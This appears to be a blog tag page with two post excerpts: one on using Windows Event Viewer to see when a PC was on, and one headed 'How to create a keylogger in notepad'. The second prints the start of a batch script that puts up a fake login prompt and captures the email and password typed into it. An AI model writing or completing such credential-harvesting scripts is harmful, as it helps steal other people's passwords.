Browsing tag

Logs

How Do You Find Out If Your Windows PC Was Running At A Particular Time

The best way to know if your computer was running at a particular time or it was turned off at a time by using the Windows Event Viewer. Starting Windows Event Viewer in Windows 7 Click the Start Button Click on Control Panel Click on System and Security (or Maintenance) Click on Administrative Tools Double-click the […]

How to create a keylogger in notepad

Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. ——————————————————————————————— @echo off color a title Login cls echo “Please Enter Email Adress And Password” echo. echo. cd “C:Logs” set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” […]